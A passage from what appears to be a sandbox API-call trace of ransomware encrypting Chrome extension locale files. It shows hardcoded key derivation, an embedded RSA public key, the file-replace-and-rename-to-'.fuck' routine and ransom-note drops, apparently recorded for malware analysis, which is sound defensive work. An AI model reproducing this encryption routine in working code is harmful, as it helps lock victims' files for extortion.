| out: phProv=0x2b9bc50*=0x29897c0) returned 1 [0250.794] CryptImportPublicKeyInfo (in: hCryptProv=0x29897c0, dwCertEncodingType=0x1, pInfo=0x2991730*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2991760*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2991768*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2985d20) returned 1 [0250.794] CryptEncrypt (in: hKey=0x2985d20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0250.794] CryptEncrypt (in: hKey=0x2985d20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x298a0c8*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x298a0c8*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0250.794] WriteFile (in: hFile=0x5d58, lpBuffer=0x298a0c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x298a0c8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0250.795] ReadFile (in: hFile=0x5d5c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xfd, lpOverlapped=0x0) returned 1 [0250.796] CryptEncrypt (in: hKey=0x2985ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xfd, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0x100) returned 1 [0250.796] WriteFile (in: hFile=0x5d58, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x100, lpOverlapped=0x0) returned 1 [0250.796] CloseHandle (hObject=0x5d5c) returned 1 [0250.797] CloseHandle (hObject=0x5d58) returned 1 [0250.797] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sv\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sv\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sv\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sv\\messages.json"), bFailIfExists=0) returned 1 [0250.800] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sv\\messages.json", dwFileAttributes=0x0) returned 1 [0250.800] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sv\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sv\\messages.json.gsg")) returned 1 [0250.802] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sv\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sv\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sv\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sv\\messages.json.fuck")) returned 1 [0250.802] CryptDestroyHash (hHash=0x2985a20) returned 1 [0250.802] CryptDestroyKey (hKey=0x2985ea0) returned 1 [0250.802] CryptReleaseContext (hProv=0x2989270, dwFlags=0x0) returned 1 [0250.802] FindNextFileA (in: hFindFile=0x2985ba0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0250.803] FindClose (in: hFindFile=0x2985ba0 | out: hFindFile=0x2985ba0) returned 1 [0250.803] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sv\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sv\\readme_back_files.htm")) returned 0xffffffff [0250.803] AreFileApisANSI () returned 1 [0250.803] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3850, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 154 [0250.803] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sv\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sv\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d54 [0250.803] GetFileType (hFile=0x5d54) returned 0x1 [0250.804] WriteFile (in: hFile=0x5d54, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0250.805] FindNextFileA (in: hFindFile=0x29387b8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0250.805] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\th\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2985ea0 [0250.806] FindNextFileA (in: hFindFile=0x2985ea0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0250.806] FindNextFileA (in: hFindFile=0x2985ea0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0250.806] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0250.806] GetLastError () returned 0x0 [0250.806] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\th\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\th\\messages.json")) returned 0x20 [0250.807] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\th\\messages.json", dwFileAttributes=0x80) returned 1 [0250.807] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\th\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\th\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0250.808] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\th\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\th\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0250.809] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\th\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0250.809] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2989270) returned 1 [0250.811] CryptCreateHash (in: hProv=0x2989270, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0250.811] lstrlenA (lpString="YpinUbJDdIEgxfEoLIcGdepQzMlQm") returned 29 [0250.811] CryptHashData (hHash=0x2985ba0, pbData=0x28cb350, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0250.811] CryptDeriveKey (in: hProv=0x2989270, Algid=0x6610, hBaseData=0x2985ba0, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2985f20) returned 1 [0250.811] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----h", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0250.811] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0250.811] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2989408) returned 1 [0250.812] CryptImportPublicKeyInfo (in: hCryptProv=0x2989408, dwCertEncodingType=0x1, pInfo=0x2992770*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x29927a0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x29927a8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2985aa0) returned 1 [0250.812] CryptEncrypt (in: hKey=0x2985aa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0250.812] CryptEncrypt (in: hKey=0x2985aa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x298a150*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x298a150*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0250.812] WriteFile (in: hFile=0x5d64, lpBuffer=0x298a150*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x298a150*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0250.813] ReadFile (in: hFile=0x5d60, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0x164, lpOverlapped=0x0) returned 1 [0250.814] CryptEncrypt (in: hKey=0x2985f20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0x164, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0x170) returned 1 [0250.814] WriteFile (in: hFile=0x5d64, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x170, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x170, lpOverlapped=0x0) returned 1 [0250.814] CloseHandle (hObject=0x5d60) returned 1 [0250.814] CloseHandle (hObject=0x5d64) returned 1 [0250.814] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\th\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\th\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\th\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\th\\messages.json"), bFailIfExists=0) returned 1 [0250.817] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\th\\messages.json", dwFileAttributes=0x0) returned 1 [0250.818] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\th\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\th\\messages.json.gsg")) returned 1 [0250.819] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\th\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\th\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\th\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\th\\messages.json.fuck")) returned 1 [0250.820] CryptDestroyHash (hHash=0x2985ba0) returned 1 [0250.820] CryptDestroyKey (hKey=0x2985f20) returned 1 [0250.820] CryptReleaseContext (hProv=0x2989270, dwFlags=0x0) returned 1 [0250.820] FindNextFileA (in: hFindFile=0x2985ea0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0250.820] FindClose (in: hFindFile=0x2985ea0 | out: hFindFile=0x2985ea0) returned 1 [0250.820] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\th\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\th\\readme_back_files.htm")) returned 0xffffffff [0250.820] AreFileApisANSI () returned 1 [0250.820] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4378, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 154 [0250.820] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\th\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\th\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0250.825] GetFileType (hFile=0x5d5c) returned 0x1 [0250.825] WriteFile (in: hFile=0x5d5c, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0250.826] FindNextFileA (in: hFindFile=0x29387b8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0250.826] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\tr\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2985ea0 [0250.826] FindNextFileA (in: hFindFile=0x2985ea0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0250.826] FindNextFileA (in: hFindFile=0x2985ea0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0250.826] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0250.826] GetLastError () returned 0x0 [0250.826] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\tr\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\tr\\messages.json")) returned 0x20 [0250.827] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\tr\\messages.json", dwFileAttributes=0x80) returned 1 [0250.827] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\tr\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\tr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0250.827] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\tr\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\tr\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0250.828] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\tr\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0250.829] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2989270) returned 1 [0250.830] CryptCreateHash (in: hProv=0x2989270, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0250.831] lstrlenA (lpString="YpinUbJDdIEgxfEoLIcGdepQzMlQm") returned 29 [0250.831] CryptHashData (hHash=0x2985f20, pbData=0x28cb378, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0250.831] CryptDeriveKey (in: hProv=0x2989270, Algid=0x6610, hBaseData=0x2985f20, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2985a20) returned 1 [0250.831] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----h", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0250.831] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0250.831] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x298a1d8) returned 1 [0250.831] CryptImportPublicKeyInfo (in: hCryptProv=0x298a1d8, dwCertEncodingType=0x1, pInfo=0x2991e80*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2991eb0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2991eb8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2984520) returned 1 [0250.831] CryptEncrypt (in: hKey=0x2984520, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0250.831] CryptEncrypt (in: hKey=0x2984520, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x298a260*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x298a260*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0250.831] WriteFile (in: hFile=0x5d60, lpBuffer=0x298a260*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x298a260*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0250.832] ReadFile (in: hFile=0x5d64, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0x10e, lpOverlapped=0x0) returned 1 [0250.833] CryptEncrypt (in: hKey=0x2985a20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0x10e, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0x110) returned 1 [0250.834] WriteFile (in: hFile=0x5d60, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x110, lpOverlapped=0x0) returned 1 [0250.834] CloseHandle (hObject=0x5d64) returned 1 [0250.834] CloseHandle (hObject=0x5d60) returned 1 [0250.834] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\tr\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\tr\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\tr\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\tr\\messages.json"), bFailIfExists=0) returned 1 [0250.837] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\tr\\messages.json", dwFileAttributes=0x0) returned 1 [0250.837] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\tr\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\tr\\messages.json.gsg")) returned 1 [0250.838] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\tr\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\tr\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\tr\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user 